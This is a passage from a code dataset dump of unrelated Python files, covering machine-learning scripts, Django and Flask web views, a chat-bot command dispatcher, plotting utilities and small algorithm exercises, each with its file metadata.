import train_test_split\nfrom sklearn.svm import SVR\nfrom sklearn import metrics\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nimport common\n\n\n\nclass UI(QMainWindow):\n def __init__(self,df,target,user_actions):\n super(UI, self).__init__()\n uic.loadUi(\"../ui_files/LogisticRegression.ui\", self)\n self.user_act=user_actions\n global data ,steps\n data=data_visualise.data_()\n steps=common.common_steps(df,target)\n self.X,self.n_classes,self.target_value,self.df,self.column_list=steps.return_data()\n self.target = self.findChild(QLabel,\"target\")\n self.columns= self.findChild(QListWidget,\"columns\")\n self.test_size= self.findChild(QLabel,\"test_size\") \n self.target = self.findChild(QLabel,\"target\")\n self.columns= self.findChild(QListWidget,\"columns\")\n self.test_size= self.findChild(QLabel,\"test_size\") \n \n self.c_=self.findChild(QLineEdit,\"c_\")\n self.penalty=self.findChild(QComboBox,\"penalty\")\n self.solver=self.findChild(QComboBox,\"solver\") \n self.dual=self.findChild(QComboBox,\"dual\") \n self.max_iter=self.findChild(QLineEdit,\"max_iter\")\n self.fit_inter=self.findChild(QComboBox,\"fit_inter\") \n self.multi_class=self.findChild(QComboBox,\"multi_class\")\n self.tol=self.findChild(QLineEdit,\"tol\")\n self.train_btn=self.findChild(QPushButton,\"train\")\n \n self.mae=self.findChild(QLabel,\"mae\")\n self.mse=self.findChild(QLabel,\"mse\")\n self.rmse=self.findChild(QLabel,\"rmse\")\n self.accuracy=self.findChild(QLabel,\"accuracy\")\n self.roc_btn=self.findChild(QPushButton,\"roc\")\n self.X_combo=self.findChild(QComboBox,\"X_combo\")\n self.Y_combo=self.findChild(QComboBox,\"Y_combo\")\n\n self.test_data=self.findChild(QLineEdit,\"test_data\")\n self.test_size_btn=self.findChild(QPushButton,\"test_size_btn\")\n self.train_btn.clicked.connect(self.training)\n self.conf_mat_btn=self.findChild(QPushButton,\"conf_mat\")\n #self.roc_btn.clicked.connect(self.roc_plot)\n self.conf_mat_btn.clicked.connect(self.conf_matrix)\n self.test_size_btn.clicked.connect(self.test_split)\n self.dwnld.clicked.connect(self.download_model)\n self.setvalue()\n self.show()\n\n def setvalue(self):\n self.target.setText(self.target_value)\n self.columns.clear()\n self.columns.addItems(self.column_list)\n self.X_combo.addItems(self.column_list)\n self.Y_combo.addItems(self.column_list)\n\n \n def test_split(self):\n\n self.x_train,self.x_test,self.y_train,self.y_test = train_test_split(self.df,self.X[self.target_value],test_size=float(self.test_data.text()),random_state=0)\n print(self.y_train.shape)\n print(self.y_test.shape)\n self.train_size.setText(str(self.x_train.shape))\n self.test_size.setText(str(self.x_test.shape))\n\n def download_model(self):\n\n name = QtWidgets.QFileDialog.getSaveFileName(self, 'Save File','/home/akshay/Desktop',\"pickle(*.pkl)\")\n #file = open(name[0],'w')\n \n pkl_filename = name[0]\n with open(pkl_filename, 'wb') as file:\n pickle.dump(self.lr, file) \n \n self.user_act.save_file(pkl_filename) \n\n def training(self):\n\n self.lr = LogisticRegression(C=float(self.c_.text()),penalty=self.penalty.currentText(),dual=self.dual.currentText()=='True',tol=float(self.tol.text()),max_iter=float(self.max_iter.text()),fit_intercept=self.fit_inter.currentText()=='True',random_state=1,solver=self.solver.currentText(),multi_class=self.multi_class.currentText())\n self.lr.fit(self.x_train,self.y_train)\n \n self.pre=self.lr.predict(self.x_test)\n self.mae.setText(str(metrics.mean_absolute_error(self.y_test,self.pre)))\n self.mse.setText(str(metrics.mean_squared_error(self.y_test,self.pre)))\n self.rmse.setText(str(np.sqrt(metrics.mean_squared_error(self.y_test,self.pre))))\n self.accuracy.setText(str(accuracy_score(self.pre,self.y_test)))\n text=steps.classification_(self.y_test,self.pre)\n self.report.setPlainText(text)\n\n def conf_matrix(self):\n\n data = {'y_Actual':self.y_test.values,'y_Predicted':self.pre }\n df = pd.DataFrame(data, columns=['y_Actual','y_Predicted'])\n confusion_matrix = pd.crosstab(df['y_Actual'], df['y_Predicted'], rownames=['Actual'], colnames=['Predicted'])\n plt.figure()\n sns.heatmap(confusion_matrix, annot=True)\n plt.show()\n\n ","sub_path":"codes/logistic_reg.py","file_name":"logistic_reg.py","file_ext":"py","file_size_in_byte":5004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"33787759","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\n#import random\n#import matplotlib.pyplot as plt\n#import math\n#from sklearn.datasets import load_iris\n\n\n# In[2]:\n\n\ndef sigmoid(z):\n return 1 / (1 + np.exp(-z))\n\n\n# In[3]:\n\n\ndef inference(w, b, X): \n return sigmoid(np.dot(X,w) + b)\n\n\n# In[4]:\n\n\ndef eval_loss(w, b, X, y): \n h = inference(w, b, X)\n loss = -1 * np.sum(y*np.log(h)+(1-y)*np.log(1 - h))/ X.shape[1]\n return loss\n\n\n# In[5]:\n\n\ndef gradient(w, b, X, y):\n num_samples, nums_x = X.shape\n h = inference(w, b, X)\n\n dw = np.sum(X * (np.repeat((h-y),nums_x).reshape(num_samples,-1)), 0)/ num_samples\n #np.repeat(np.expand_dims((h-y),1),nums_x,1)\n db = np.sum(h-y) / num_samples\n\n return dw, db\n\n\n# In[6]:\n\n\ndef cal_step_gradient(w, b, batch_x, batch_y,lr):\n dw, db = gradient(w, b, batch_x, batch_y)\n return w-dw*lr, b-db*lr\n\n\n# In[7]:\n\n\ndef train(X, y, batch_size, lr, max_iter):\n num_samples, nums_x = X.shape\n w = np.zeros(nums_x)\n b = 0\n \n while max_iter:\n batch_idxs = np.random.choice(num_samples, batch_size)\n w, b = cal_step_gradient(w, b, X[batch_idxs], y[batch_idxs], lr)\n loss = eval_loss(w, b, X, y)\n if max_iter%1000==0:\n print('w:{0}, b:{1}'.format(w, b))\n print('loss is {0}'.format(loss))\n max_iter -= 1\n\n\n# In[8]:\n\n\ndef gen_sample_data():\n num_samples = 400\n w = np.random.randint(0, 10, size=4) + random.random()\t\t# for noise random.random[0, 1)\n b = np.random.randint(0, 5) + random.random()\n X = np.random.randint(0, 200, size=(400,4)) * np.random.random()\n y = np.dot(X,w) + b\n y_ = np.array([1 if i >np.median(y) else 0 for i in y ])\n return X, y_, w, b\n\n\n# In[9]:\n\n\ndef run():\n X, y, w, b = gen_sample_data()\n print(w,b,np.sum(y),X.shape)\n lr = 0.001\n batch_size = 50\n max_iter = 10000\n train(X, y, batch_size, lr, max_iter)\n\nif __name__ == '__main__':\t\n run()\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"week3/logisticRegression.py","file_name":"logisticRegression.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"144044651","text":"INPUT_PATH = 'small.in'\n\ndef main():\n test_cases = parse_input(INPUT_PATH)\n solutions = []\n for i, test_case in enumerate(test_cases):\n print('-' * 10)\n print('Test case', i)\n solution = solve(*test_case)\n print(test_case, '->', solution)\n solutions.append(solution)\n output_solutions(solutions)\n\n\ndef parse_input(path):\n with open(path) as f:\n n = int(f.readline())\n lines = f.read().split('\\n')\n test_cases = [tuple(map(int, line.split())) for line in lines][:n]\n return test_cases\n\n\ndef output_solutions(solutions):\n with open('output', 'w') as f:\n for i, solution in enumerate(solutions, 1):\n possible, matrix = solution\n f.write('Case #{i}: {result}\\n'.format(i=i, result='POSSIBLE' if possible else 'IMPOSSIBLE'))\n if possible:\n for row in matrix:\n f.write(''.join(map(str, row)) + '\\n')\n\n\ndef solve(b, m):\n # NOTE: b > 1\n #print('solving for:', b, m)\n max_paths = 2 ** (b - 2)\n if m > max_paths:\n return False, None\n matrix = [[(1 if j > i else 0) for j in range(b)] for i in range(b)]\n if m == max_paths:\n return True, matrix\n binary = bin(m)[2:][::-1]\n for row in range(b-1):\n if 1 <= row <= len(binary):\n matrix[row][b-1] = int(binary[row-1])\n else:\n matrix[row][b-1] = 0\n return True, matrix\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"solutions_5744014401732608_0/Python/arteffi/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"513462267","text":"from django import forms\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.core.paginator import Paginator\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render, redirect, get_object_or_404\nimport json\nfrom .models import (Account, Funds, FundsManager, Beneficiary, Due, Notification) \nfrom .forms import (BeneficiaryForm, FundsForm)\nimport pdb\n\n\ndef info_view(information):\n return render('account/information.html', {\"information\": information})\n\n@login_required(login_url='login')\ndef account(request):\n acc = Account.objects.get(user=request.user.id)\n dues = acc.get_due_list()\n\n dues_page = []\n for username, due_list in dues.items():\n for funds_id, amount in due_list.items():\n dues_page.append((username, funds_id, amount))\n\n paginator = Paginator(dues_page, 6)\n page = request.GET.get('page')\n dues_page = paginator.get_page(page)\n\n dues = {}\n for username, funds_id, amount in dues_page.object_list:\n if username in dues:\n dues[username].update({funds_id: amount})\n else:\n dues.update({username: {funds_id: amount}})\n\n return render(request, 'account/account.html',{\n 'dues': dues,\n \"dues_page\": dues_page,\n 'account_value': acc.get_value(),\n 'user_name': request.user.username}\n )\n\n\n@login_required(login_url='login')\ndef funds(request, pk):\n funds = get_object_or_404(Funds, pk=pk)\n return render(request, 'account/funds.html', {'funds': funds})\n\n\n@login_required(login_url='login')\ndef myfunds(request):\n acc = Account.objects.get(user=request.user.id)\n paginator = Paginator(acc.funds_set.all().order_by('-date'), 8)\n page = request.GET.get('page')\n funds = paginator.get_page(page)\n return render(request, 'account/myfunds.html', {\"myfunds\": funds})\n\n\n@login_required(login_url='login')\ndef history(request):\n acc = Account.objects.get(user=request.user.id)\n paginator = Paginator(acc.get_history_funds(), 10)\n page = request.GET.get('page')\n history_funds = paginator.get_page(page)\n return render(request, 'account/history.html', {\"history_funds\": history_funds})\n\ndef post_funds(request, BeneficiaryFormSet, pk):\n form = FundsForm(request.POST)\n formset = BeneficiaryFormSet(request.POST)\n valid = False\n beneficiaries = {}\n if formset.is_valid() and form.is_valid():\n valid = True\n purpose = form.cleaned_data['purpose']\n purpose_price = form.cleaned_data['purpose_price']\n for f in formset:\n account = f.cleaned_data['account_id']\n contribution = f.cleaned_data['contribution']\n beneficiaries.update({account: contribution})\n else:\n for f in formset:\n if not f.is_valid():\n print(f.errors)\n\n if valid:\n if pk is None:\n funds = Funds.objects.create(\n owner=Account.objects.get(user=request.user),\n purpose=purpose,\n purpose_price=purpose_price\n )\n else:\n funds = Funds.objects.get(pk=pk)\n funds_manager = FundsManager(funds)\n funds_manager.update(purpose=purpose, purpose_price=purpose_price)\n funds_manager.update_beneficiaries(beneficiaries)\n return redirect(myfunds)\n\n return info_view(\"Nie udalo sie\")\n\n@login_required(login_url='login')\ndef edit_funds(request, pk):\n BeneficiaryFormSet = forms.formset_factory(BeneficiaryForm, extra=0)\n if request.method == 'POST':\n return post_funds(request, BeneficiaryFormSet, pk)\n else:\n funds = get_object_or_404(Funds, pk=pk)\n account = Account.objects.get(user=request.user)\n if account != funds.owner:\n return HttpResponse(\"Nie masz uprawnien do edytowania tej skladki\")\n form = FundsForm(initial={\n 'purpose': funds.purpose,\n 'purpose_price': funds.purpose_price\n })\n beneficiaries_form_set = []\n for beneficiary in funds.beneficiaries.all():\n beneficiaries_form_set.append({\n 'account_id': beneficiary.account.user.username,\n 'contribution': beneficiary.contribution\n })\n print(beneficiaries_form_set)\n formset = BeneficiaryFormSet(initial=beneficiaries_form_set)\n return render(request, 'account/edit_funds.html', {\n 'form': form,\n 'formset': formset,\n 'sum_of_contribution': funds.sum_of_contribution,\n 'owner': request.user.username\n })\n\n@login_required(login_url='login')\ndef new_funds(request):\n BeneficiaryFormSet = forms.formset_factory(BeneficiaryForm, extra=0)\n if request.method == 'POST':\n return post_funds(request, BeneficiaryFormSet, None)\n formset = BeneficiaryFormSet()\n form = FundsForm()\n return render(request, 'account/edit_funds.html', {\n 'form': form,\n 'formset': formset,\n 'sum_of_contribution': 0,\n 'owner': request.user.username\n })\n\n@login_required(login_url='login')\ndef delete_funds(request, pk):\n account = Account.objects.get(user=request.user)\n funds = get_object_or_404(Funds, pk=pk)\n if account != funds.owner:\n return redirect(myfunds)\n funds_manager = FundsManager(funds)\n funds_manager.delete_funds()\n return redirect(myfunds)\n\n\n@login_required(login_url='login')\ndef accounts(request):\n results = []\n if request.method == \"GET\":\n if u'query' in request.GET:\n value = request.GET[u'query']\n model_results = User.objects.filter(username__icontains=value)\n results = [x.username for x in model_results]\n return JsonResponse(json.dumps(results), safe=False)\n\n\n@login_required(login_url='login')\ndef new_notify(request):\n response = {\n \"new_notifications\": 0,\n \"message\": \"Nie ma nowej notyfikacji\"\n }\n if request.method == \"GET\":\n acc = Account.objects.get(user=request.user.id)\n new_notifications = acc.notifications_received.filter(seen=False)\n if new_notifications.exists():\n response[\"new_notifications\"] = new_notifications.count()\n response[\"message\"] = \"Sa nowe notyfikacje\"\n return JsonResponse(json.dumps(response), safe=False)\n\ndef send_notification(request):\n sent = None\n if request.method == \"GET\":\n if u'due_id' in request.GET:\n if u'due_type' in request.GET:\n due_type = int(request.GET[u'due_type'])\n due_id = request.GET[u'due_id']\n acc = Account.objects.get(user=request.user)\n due = Due.objects.get(pk=int(due_id))\n if due_type == 0:\n sent = acc.send_notification(due)\n elif due_type == 1:\n sent = acc.accept_notification(due)\n else:\n sent = acc.decline_notification(due)\n\n return sent\n\n@login_required(login_url='login')\ndef notify(request):\n response = {\n \"success\": False,\n \"message\": \"Nie udalo sie stworzyc notyfikacji\"\n }\n if request.method == \"GET\":\n if u'due_id' in request.GET:\n if u'due_type' in request.GET:\n due_type = int(request.GET[u'due_type'])\n due_id = request.GET[u'due_id']\n acc = Account.objects.get(user=request.user)\n due = Due.objects.get(pk=int(due_id))\n sent = acc.send_notification(due)\n if sent is not None:\n response[\"success\"] = True\n response[\"message\"] = \"Notyfikacja stworzona pomyslnie\"\n return JsonResponse(json.dumps(response), safe=False)\n\n@login_required(login_url='login')\ndef notify_back(request):\n if request.method == \"GET\":\n if u'noti_id' in request.GET:\n if u'answer' in request.GET:\n noti_id = int(request.GET[u'noti_id'])\n answer = int(request.GET[u'answer'])\n acc = Account.objects.get(user=request.user)\n noti = Notification.objects.get(pk=int(noti_id))\n noti.answered = True\n noti.save()\n due = noti.due\n if answer == 0:\n pass\n elif answer == 1:\n acc.accept_notification(due)\n else:\n acc.decline_notification(due)\n return redirect(notifications)\n\n@login_required(login_url='login')\ndef notifications(request):\n acc = Account.objects.get(user=request.user.id)\n paginator = Paginator(acc.notifications_received.filter(answered=False).order_by(\"-seen\",\"-latest_date\", \"-latest_datetime\"), 10)\n page = request.GET.get('page')\n notifications_received = paginator.get_page(page)\n for notification in acc.notifications_received.filter(seen=False):\n notification.seen = True\n notification.save()\n return render(request, 'account/notification.html',{\n \"notifications\": notifications_received,\n \"notification_types\": dict(Notification.Types.__members__)})\n pass\n","sub_path":"account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"459703358","text":"#!/usr/bin python3\n\n# Imports\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Python:\nimport re\nfrom operator import itemgetter\nfrom typing import List, Dict, Union\nfrom functools import lru_cache\n\n# 3rd party:\nfrom flask import current_app as app\n\n# Internal:\nfrom ..common.caching import cache_client\nfrom ..common.data.queries import get_last_fortnight, change_by_metric\nfrom ..common.visualisation import plot_thumbnail, get_colour\nfrom ..common.data.variables import DestinationMetrics\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\npostcode_pattern = re.compile(r'(^[a-z]{1,2}\\d{1,2}[a-z]?\\s?\\d{1,2}[a-z]{1,2}$)', re.I)\nget_value = itemgetter(\"value\")\n\n# main_metric_names: List[str] = [\n# \"newCasesByPublishDate\",\n# \"newDeaths28DaysByPublishDate\",\n# \"newAdmissions\",\n# \"newPCRTestsByPublishDate\",\n# ]\n\n\n@lru_cache(maxsize=256)\ndef get_validated_postcode(params: dict) -> Union[str, None]:\n found = postcode_pattern.search(params.get(\"postcode\", \"\").strip())\n\n if found is not None:\n extract = found.group(0)\n return extract\n\n return None\n\n\n# @lru_cache(maxsize=256)\n\n\n@cache_client.memoize(60 * 60 * 6)\ndef get_card_data(timestamp: str, category: str, metric_data, graph=True, postcode=None):\n metric_name = DestinationMetrics[category][\"metric\"]\n change = change_by_metric(timestamp, category, postcode)\n\n colour = get_colour(change, metric_name)\n\n response = {\n \"data\": metric_data,\n \"change\": change,\n \"colour\": colour,\n \"latest_date\": metric_data[0][\"date\"].strftime('%-d %B %Y')\n }\n\n if graph:\n response[\"graph\"] = plot_thumbnail(metric_data, change, metric_name)\n\n return response\n\n\n@lru_cache(maxsize=256)\ndef get_fortnight_data(latest_timestamp: str,\n area_name: str = \"United Kingdom\") -> Dict[str, dict]:\n result = dict()\n\n for category, metric_data in DestinationMetrics.items():\n metric = DestinationMetrics[category][\"metric\"]\n metric_data = get_last_fortnight(latest_timestamp, area_name, category)\n result[metric] = get_card_data(latest_timestamp, category, metric_data)\n\n return result\n","sub_path":"app/postcode/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"297464130","text":"import matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nimport os\nfrom seismdb import SeismDb\nimport matplotlib\nimport logging\nfrom global_variable import *\n\n\nclass Drawer():\n def __init__(self):\n self.db = SeismDb()\n\n def drawTightMatrix(self, plane_name, depth, saveDir=''):\n matrix = self.db.queryMatrix(plane_name, depth)\n print(matrix)\n fig = plt.imshow(matrix, vmin=vmin, vmax=vmax, cmap=plt.get_cmap(\"Greys\"))\n fig.axes.get_xaxis().set_visible(False)\n fig.axes.get_yaxis().set_visible(False)\n if saveDir == '':\n plt.show()\n else:\n path = os.path.join(saveDir, '{0}.png'.format(depth))\n if os.path.exists(path):\n logging.info('{0}已存在'.format(depth))\n else:\n try:\n plt.savefig(path, bbox_inches='tight', pad_inches=0)\n logging.info('{0}_{1}绘制完成'.format(plane_name, depth))\n plt.close()\n except FileNotFoundError:\n os.mkdir(saveDir)\n plt.savefig(path, bbox_inches='tight', pad_inches=0)\n plt.ioff()\n plt.axis('off')\n\n def drawMatrix(self, plane_name, depth, saveDir=''):\n matrix = self.db.queryMatrix(plane_name, depth)\n fig, ax = plt.subplots()\n im = ax.matshow(matrix, vmin=vmin, vmax=vmax)\n divider = make_axes_locatable(ax)\n cax = divider.new_horizontal(size=\"5%\", pad=0.3, pack_start=False)\n fig.add_axes(cax)\n cbar = fig.colorbar(im, cax=cax, orientation=\"vertical\", extend='both')\n cbar.minorticks_on()\n if saveDir == '':\n plt.show()\n else:\n path = os.path.join(saveDir, '{0}.png'.format(depth))\n if os.path.exists(path):\n logging.info('{0}已存在'.format(depth))\n else:\n try:\n plt.savefig(path)\n plt.close(fig)\n logging.info('{0}_{1}绘制完成'.format(plane_name, depth))\n except FileNotFoundError:\n os.mkdir(saveDir)\n plt.savefig(path)\n plt.close(fig)\n\n def drawCoors(self, x, y):\n matrix = [self.db.queryByOneCoord(x, y)]\n fig = plt.imshow(matrix, vmin=vmin, vmax=vmax, aspect='auto')\n fig.axes.get_xaxis().set_visible(False)\n fig.axes.get_yaxis().set_visible(False)\n return fig\n\n def drawBound(self, ox, oy, tx, ty):\n matrix = self.db.queryBound(ox, oy, tx, ty)\n fig = plt.imshow(matrix, vmin=vmin, vmax=vmax, aspect='auto')\n fig.axes.get_xaxis().set_visible(False)\n fig.axes.get_yaxis().set_visible(False)\n return fig\n\n\ndef drawAll():\n logging.basicConfig(level=logging.INFO)\n matplotlib.use('Agg')\n plt.ioff()\n plt.axis('off')\n\n drawer = Drawer()\n \"\"\"\n for i in range(0, zDepth):\n drawer.drawTightMatrix(\"xy\", i, './imgs/xy/')\n \n for i in range(0,rowCount):\n drawer.drawTightMatrix('xz', i, './imgs/{0}/'.format('xz'))\n\n for i in range(0, colCount):\n drawer.drawTightMatrix('yz', i, './imgs/{0}/'.format('yz'))\n \"\"\"\n\n\nif __name__ == '__main__':\n drawer = Drawer()\n drawAll()\n","sub_path":"server/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"151513720","text":"from uuid import uuid4\n\nfrom sourced.ml.extractors.roles_and_ids import RolesAndIdsExtractor\nfrom sourced.ml.transformers import Ignition, UastExtractor, UastDeserializer, \\\n HeadFiles, Uast2BagFeatures, Cacher, UastRow2Document, CsvSaver\nfrom sourced.ml.transformers.basic import Rower\nfrom sourced.ml.utils import create_engine\nfrom sourced.ml.utils.engine import pause\n\n\n@pause\ndef repos2roles_and_ids_entry(args):\n engine = create_engine(\"repos2roles_and_ids-%s\" % uuid4(), **args.__dict__)\n\n Ignition(engine, explain=args.explain) \\\n .link(HeadFiles()) \\\n .link(UastExtractor(languages=args.languages)) \\\n .link(UastRow2Document()) \\\n .link(Cacher.maybe(args.persist)) \\\n .link(UastDeserializer()) \\\n .link(Uast2BagFeatures([RolesAndIdsExtractor(args.split)])) \\\n .link(Rower(lambda x: dict(identifier=x[0][0], role=x[1]))) \\\n .link(CsvSaver(args.output)) \\\n .execute()\n","sub_path":"sourced/ml/cmd_entries/repos2roles_and_ids.py","file_name":"repos2roles_and_ids.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"74469921","text":"from __future__ import absolute_import\n\nimport logging\nimport time\nfrom celery import shared_task\n\n# Get an instance of a logger\nlogger = logging.getLogger('erapp')\n\n@shared_task\ndef celery_test():\n\tlogger.info('running celery_test task...')\n\ttime.sleep(5)\n\tlogger.info('finishing long-running celery task')\n\n@shared_task\ndef parse_logs():\n\tlogger.info('parsing logs...')\n\ttime.sleep(5)\n\tlogger.info('finishing parsing logs')\n","sub_path":"erprototype/erapp/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"60047831","text":"import sys, json, asyncio, logging, os\n\nimport hangups\nfrom hangups.ui.utils import get_conv_name\n\nfrom utils import text_to_segments\n\n\nclass CommandDispatcher(object):\n \"\"\"Register commands and run them\"\"\"\n def __init__(self):\n self.commands = {}\n self.unknown_command = None\n\n\n @asyncio.coroutine\n def run(self, bot, event, *args, **kwds):\n \"\"\"Run command\"\"\"\n try:\n func = self.commands[args[0]]\n except KeyError:\n if self.unknown_command:\n func = self.unknown_command\n else:\n raise\n\n # Automatically wrap command function in coroutine\n # (so we don't have to write @asyncio.coroutine decorator before every command function)\n func = asyncio.coroutine(func)\n\n args = list(args[1:])\n\n try:\n yield from func(bot, event, *args, **kwds)\n except Exception as e:\n message = \"CommandDispatcher.run: {}\".format(func.__name__)\n print(\"EXCEPTION in \" + message)\n logging.exception(message)\n\n\n def register(self, func):\n \"\"\"Decorator for registering command\"\"\"\n self.commands[func.__name__] = func\n return func\n\n def register_unknown(self, func):\n \"\"\"Decorator for registering unknown command\"\"\"\n self.unknown_command = func\n return func\n\n\n# CommandDispatcher singleton\ncommand = CommandDispatcher()\n\n@command.register\ndef help(bot, event, cmd=None, *args):\n \"\"\"list supported commands\"\"\"\n if not cmd:\n admins_list = bot.get_config_suboption(event.conv_id, 'admins')\n\n commands_all = command.commands.keys()\n commands_admin = bot._handlers.get_admin_commands(event.conv_id)\n commands_nonadmin = list(set(commands_all) - set(commands_admin))\n\n text_html = 'User commands:
    ' + ', '.join(sorted(commands_nonadmin))\n if event.user_id.chat_id in admins_list:\n text_html = text_html + '
    Admin commands:
    ' + ', '.join(sorted(commands_admin))\n else:\n try:\n command_fn = command.commands[cmd]\n text_html = \"{}: {}\".format(cmd, command_fn.__doc__)\n except KeyError:\n yield from command.unknown_command(bot, event)\n return\n\n # help can get pretty long, so we send a short message publicly, and the actual help privately\n conv_1on1_initiator = bot.get_1on1_conversation(event.user.id_.chat_id)\n if conv_1on1_initiator:\n bot.send_message_parsed(conv_1on1_initiator, text_html)\n if conv_1on1_initiator.id_ != event.conv_id:\n bot.send_message_parsed(event.conv, \"{}, I've sent you some help ;)\".format(event.user.full_name))\n else:\n bot.send_message_parsed(event.conv, \"{}, before I can help you, you need to private message me and say hi.\".format(event.user.full_name))\n\n\n@command.register\ndef ping(bot, event, *args):\n \"\"\"reply to a ping\"\"\"\n bot.send_message(event.conv, 'pong')\n\n\n@command.register_unknown\ndef unknown_command(bot, event, *args):\n \"\"\"handle unknown commands\"\"\"\n bot.send_message(event.conv,\n '{}: unknown command'.format(event.user.full_name))","sub_path":"hangupsbot/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"189669218","text":"import itertools\n\ndef fibonacci():\n a, b = 0, 1\n while True:\n yield b\n a, b = b, a+b\n\nf = fibonacci()\nnext(f) # 1\n[i for i in itertools.takewhile(lambda x: x < 100, f)]\n# [1, 2, 3, 5, 8, 13, 21, 34, 55, 89]\n","sub_path":"fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"136490923","text":"from .ttypes import Types\nimport sys\n\nclass Column:\n\n def __init__(self, name, pos):\n self.name = name\n self.idx = pos\n self.data = []\n self.type = None\n\n def addData(self, data):\n if len(data) > 0:\n self.type = Types.getType(data[0])\n assert len(self.data) == 0\n self.data = data\n return self\n\n def appendElement(self, elem):\n assert type(elem) is not list or type(elem) is not tuple, \"Call addData when passing a list or tuple\"\n if self.type == None:\n self.type = Types.getType(elem)\n else:\n #assert type(elem) == self.type\n pass\n\n self.data.append(elem)\n return self\n\n # Create new list of values\n def indexOf(self, filter):\n \"\"\" Return a list of indexes of the elements of the column that satisfy:\n filter(i, c[i]) = True\n \"\"\"\n idx = []\n for i in range(len(self.data)):\n v = self.data[i]\n if filter(i, v): idx.append(i)\n return idx\n\n def collect(self, filter):\n \"\"\" Returns a list of the elements (e[i]) of the list that satisfy: filter(i, e[i]) = True \"\"\" \n \n values = []\n for i in range(len(self.data)):\n v = self.data[i]\n if (filter(i, v)): values.append(v)\n return values\n\n def remove(self, filter):\n \"\"\" Removes elements (e[i]) of this column that satisfy: filter(i, e[i]) = True\n The number of elements stored in this column may be fewer after calling this function.\n \"\"\"\n ndata = []\n for i in range(len(self.data)):\n v = self.data[i]\n if filter(i, v):\n pass\n else:\n ndata.append(v)\n self.data = ndata\n\n def clone(self):\n \"\"\" Returns an exact copy of this column that does not shared data with \n this column (deep-copy)\n \"\"\" \n c = Column(self.name, self.idx)\n c.addData(self.data.copy())\n return c\n\n def apply(self, func):\n \"\"\" Creates a new column with element i in this column as: c[i] = func(i, c[i]) \n Similar to apply, but it changes the values in place.\n \"\"\"\n nvals = []\n for i in range(len(self.data)):\n d = self.data[i]\n val = func(i, d)\n nvals.append(val)\n return nvals\n\n def map(self, func):\n \"\"\" Assign value to element i in this column as: c[i] = func(i, c[i]) \n Similar to apply, but it changes the values in place.\n \"\"\"\n nvals = []\n for i in range(len(self.data)):\n d = self.data[i]\n self.data[i] = func(i, d)\n return self\n\n def reduce(self, func, result):\n \"\"\" Applies func on each element of this column and returns the final result.\n The function func must have the type: func(i, e, result), where result is \n either the value passed to the function or the result of the last call to \n func.\n For example, to compute the minimum value of a column:\n c.reduce(func = lambda (i, e, result): e if e < result else result, result = BIG_NUMBER )\n \"\"\"\n \n for i in range(len(self.data)):\n e = self.data[i]\n result = func(i, e, result)\n return result\n\n def list(self, out = sys.stdout, writeName = False):\n \"\"\" Write elements of column to out. \"\"\"\n if writeName: print(self.name) \n for e in self.data: print(e)\n \n def __str__(self):\n s = \"Col[%4s]: \\t %20s \\t %4s< \\t %6d\"%(self.idx, self.name, self.type, len(self.data) )\n return s\n\n def __getitem__(self, idx):\n assert idx < len(self.data)\n return self.data[idx]\n\n def __len__(self):\n return len(self.data)\n\n def __iter__(self):\n for v in self.data:\n yield v\n\nif __name__ == \"__main__\":\n c = Column(\"Waste\", 0)\n c.addData([1,2,3,4,5])\n print(c)\n\n sum = c.reduce(func = lambda i, d, result: result + d, result = 0)\n print(\"sum: %d\"%sum)\n\n min = c.reduce(func = lambda i, d, result: result if result < d else d, result=100000)\n print(\"min: %d\"%min)","sub_path":"src/column.py","file_name":"column.py","file_ext":"py","file_size_in_byte":4234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"128941856","text":"\nimport os, sys\n\nfrom ism.src.initIsm import initIsm\nfrom math import pi\nfrom ism.src.mtf import mtf\nfrom numpy.fft import fftshift, ifft2, fft2\nimport numpy as np\nfrom common.io.writeToa import writeToa\nfrom common.io.readIsrf import readIsrf\nfrom scipy.interpolate import interp1d, interp2d\nfrom common.plot.plotMat2D import plotMat2D\nfrom common.plot.plotF import plotF\nfrom scipy.signal import convolve2d\nfrom 